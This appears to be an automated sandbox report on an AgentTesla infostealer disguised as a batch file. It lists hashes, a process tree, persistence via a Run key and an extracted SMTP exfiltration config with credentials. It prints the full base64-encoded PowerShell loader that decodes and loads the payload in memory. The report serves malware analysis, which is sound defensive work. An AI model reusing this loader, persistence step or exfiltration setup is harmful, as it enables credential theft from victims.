Analysis
-
max time kernel
143s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20231023-en -
resource tags
arch:x64arch:x86image:win10v2004-20231023-enlocale:en-usos:windows10-2004-x64system -
submitted
07-11-2023 08:53
Static task
static1
Behavioral task
behavioral1
Sample
SOA_SEVEN HILLS CARGO.bat
Resource
win7-20231020-en
Behavioral task
behavioral2
Sample
SOA_SEVEN HILLS CARGO.bat
Resource
win10v2004-20231023-en
General
-
Target
SOA_SEVEN HILLS CARGO.bat
-
Size
1010KB
-
MD5
598a471dddb453d80036375fc9b8893e
-
SHA1
7682286b446689b8f9f2d0b2c03554b13f03d396
-
SHA256
348317a6cdde242d659ca060832df6ef808d24bb96d78d5ca3f58c50b7b6cce2
-
SHA512
e7e1ac713dbdb6a06c0f6586c5700088ecbbdffa69befd221418830c8fd9218116c81b95181ec1b5c917f32abb10ce6bb6cb42c4936dca3e6d41422de4395e9a
-
SSDEEP
24576:ot6fGhEePZQVxHJ3/DYfqBwX0nuKRY5AI9PpAVH8xP:KhtZQvltwXl95rprZ
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
mail.asiaparadisehotel.com - Port:
587 - Username:
[email protected] - Password:
^b2ycDldex$@ - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Executes dropped EXE 1 IoCs
pid Process 2440 Yjxykn.png -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TlKsFB = "C:\\Users\\Admin\\AppData\\Roaming\\TlKsFB\\TlKsFB.exe" Yjxykn.png -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 23 api.ipify.org 24 api.ipify.org -
Program crash 1 IoCs
pid pid_target Process procid_target 2108 2440 WerFault.exe 94 -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2440 Yjxykn.png 2440 Yjxykn.png 2440 Yjxykn.png 2440 Yjxykn.png -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2440 Yjxykn.png Token: SeDebugPrivilege 2440 Yjxykn.png -
Suspicious use of WriteProcessMemory 17 IoCs
description pid Process procid_target PID 3868 wrote to memory of 3692 3868 cmd.exe 87 PID 3868 wrote to memory of 3692 3868 cmd.exe 87 PID 3868 wrote to memory of 4696 3868 cmd.exe 86 PID 3868 wrote to memory of 4696 3868 cmd.exe 86 PID 3868 wrote to memory of 3256 3868 cmd.exe 88 PID 3868 wrote to memory of 3256 3868 cmd.exe 88 PID 3256 wrote to memory of 5060 3256 cmd.exe 90 PID 3256 wrote to memory of 5060 3256 cmd.exe 90 PID 3256 wrote to memory of 3392 3256 cmd.exe 91 PID 3256 wrote to memory of 3392 3256 cmd.exe 91 PID 3256 wrote to memory of 4784 3256 cmd.exe 92 PID 3256 wrote to memory of 4784 3256 cmd.exe 92 PID 3256 wrote to memory of 3904 3256 cmd.exe 93 PID 3256 wrote to memory of 3904 3256 cmd.exe 93 PID 3256 wrote to memory of 2440 3256 cmd.exe 94 PID 3256 wrote to memory of 2440 3256 cmd.exe 94 PID 3256 wrote to memory of 2440 3256 cmd.exe 94
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SOA_SEVEN HILLS CARGO.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3868 -
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Yjxykn.png2⤵PID:4696
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "2⤵PID:3692
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\SOA_SEVEN HILLS CARGO.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3256 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "3⤵PID:5060
-
-
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Yjxykn.png3⤵PID:3392
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "3⤵PID:4784
-
-
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i "C:\Users\Admin\AppData\Local\Temp\SOA_SEVEN HILLS CARGO.bat" C:\Users\Admin\AppData\Local\Temp\Yjxykn.png.bat3⤵PID:3904
-
-
C:\Users\Admin\AppData\Local\Temp\Yjxykn.pngC:\Users\Admin\AppData\Local\Temp\Yjxykn.png -win 1 -enc JABGAGwAbgB1AG8AdAB4AGcAYgBrAG8AIAA9ACAAWwBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAKAAoAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlACkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACIALgBiAGEAdAAiACkALAAgAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4ACkAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0AbABhAHMAdAAgADEAOwAgACQATwB4AHEAdgB5AG0AagBkAG4AZgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABGAGwAbgB1AG8AdAB4AGcAYgBrAG8AKQA7ACQASQBqAGgAcQB3AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAE8AeABxAHYAeQBtAGoAZABuAGYAIAApADsAJABvAHUAdABwAHUAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQATABhAHYAdwBoAHIAYQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABJAGoAaABxAHcAdAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQATABhAHYAdwBoAHIAYQAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQATABhAHYAdwBoAHIAYQAuAEMAbABvAHMAZQAoACkAOwAkAEkAagBoAHEAdwB0AC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQATwB4AHEAdgB5AG0AagBkAG4AZgAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABPAHgAcQB2AHkAbQBqAGQAbgBmACkAOwAgACQAVwBuAGIAdQBvACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAE8AeABxAHYAeQBtAGoAZABuAGYAKQA7ACAAJABMAHoAYwB1AGgAaAB2AHIAdwAgAD0AIAAkAFcAbgBiAHUAbwAuAEcAZQB0AEUAeABwAG8AcgB0AGUAZABUAHkAcABlAHMAKAApAFsAMABdADsAIAAkAEYAcgBsAGgAZQAgAD0AIAAkAEwAegBjAHUAaABoAHYAcgB3AC4ARwBlAHQATQBlAHQAaABvAGQAcwAoACkAWwAwAF0ALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAJABuAHUAbABsACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2440 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2440 -s 32044⤵
- Program crash
PID:2108
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 2440 -ip 24401⤵PID:3936
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
-
Filesize
1010KB
MD5598a471dddb453d80036375fc9b8893e
SHA17682286b446689b8f9f2d0b2c03554b13f03d396
SHA256348317a6cdde242d659ca060832df6ef808d24bb96d78d5ca3f58c50b7b6cce2
SHA512e7e1ac713dbdb6a06c0f6586c5700088ecbbdffa69befd221418830c8fd9218116c81b95181ec1b5c917f32abb10ce6bb6cb42c4936dca3e6d41422de4395e9a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82